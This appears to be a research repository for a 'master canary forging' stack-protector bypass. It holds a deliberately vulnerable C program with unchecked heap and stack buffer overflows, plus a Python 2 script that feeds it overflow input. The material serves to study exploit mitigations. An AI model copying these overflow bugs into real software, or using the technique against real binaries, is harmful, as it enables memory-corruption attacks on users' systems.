├── README.md
├── a.out
├── exploit.py
└── poc.c

/README.md:
--------------------------------------------------------------------------------
# MasterCanaryForging-PoC
The environment where PoC was executed:
- Ubuntu 15.04 amd64 vanilla

--------------------------------------------------------------------------------
/a.out:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/potetisensei/MasterCanaryForging-PoC/fb6412ba4f3112d0fcc90cd22c4635b7fe2e9b1e/a.out
--------------------------------------------------------------------------------
/exploit.py:
--------------------------------------------------------------------------------
# Python 2 syntax (print statement). Emits the three stdin inputs that
# poc.c's main() consumes: two size_t values for the scanf("%zu") calls,
# then the raw bytes for the two fread() calls. Presumably piped into the
# binary built from poc.c -- the listing does not show the invocation.
print "{}".format(0x21000)   # alloc_size: heap_buf = malloc(0x21000)
print "{}".format(0x23720)   # read_size: larger than alloc_size, so fread() overruns heap_buf
# 0x23720 bytes are consumed by the heap fread(); the trailing 0x30 (48) bytes
# feed stack_overflow()'s fread(stack_buf, 1, 48, stdin) into a 16-byte buffer.
print "a" * (0x23720+0x30)
--------------------------------------------------------------------------------
/poc.c:
--------------------------------------------------------------------------------
/*
 * gcc poc.c -fstack-protector-all -Wl,-z,now,-z,-relro
 *
 * Deliberately vulnerable target program for the PoC. -fstack-protector-all
 * places a canary in every function frame; the linker flags request BIND_NOW
 * and RELRO.
 * NOTE(review): "-z,-relro" looks like a typo for "-z,relro" -- GNU ld warns
 * about and ignores unrecognised -z keywords, so the GOT may not actually be
 * made read-only. Confirm on the built binary (e.g. a GNU_RELRO segment in
 * `readelf -l`) before relying on that hardening.
 */

#include   /* header name lost in extraction; fread/scanf/stdin require <stdio.h> */
#include   /* header name lost in extraction; malloc/free require <stdlib.h> */

/*
 * Stack buffer overflow: reads up to 48 bytes from stdin into a 16-byte
 * buffer, so the write runs past stack_buf and over the frame's canary.
 * The fix would be to read at most sizeof(stack_buf) bytes.
 */
void stack_overflow(void) {
    char stack_buf[16];

    fread(stack_buf, 1, 48, stdin);  /* 48 > sizeof(stack_buf): overflow */
    return;
}

/*
 * Reads alloc_size and read_size from stdin, allocates alloc_size bytes and
 * then reads read_size bytes into that allocation without checking
 * read_size <= alloc_size -- a heap overflow with attacker-controlled length.
 * A stack canary does not cover this class of bug; the missing bounds check
 * is the defect. Returns -1 if either size cannot be parsed or malloc fails,
 * 0 otherwise.
 */
int main(void) {
    size_t alloc_size = 0;
    size_t read_size = 0;
    char *heap_buf;

    if (scanf("%zu", &alloc_size) != 1) return -1;
    if (scanf("%zu", &read_size) != 1) return -1;

    heap_buf = (char*)malloc(alloc_size);
    if (!heap_buf) return -1;

    /* No check that read_size <= alloc_size: bytes past the allocation are
     * overwritten when the caller supplies a larger read_size. */
    fread(heap_buf, sizeof(char), read_size, stdin);
    stack_overflow();
    free(heap_buf);
    return 0;
}
--------------------------------------------------------------------------------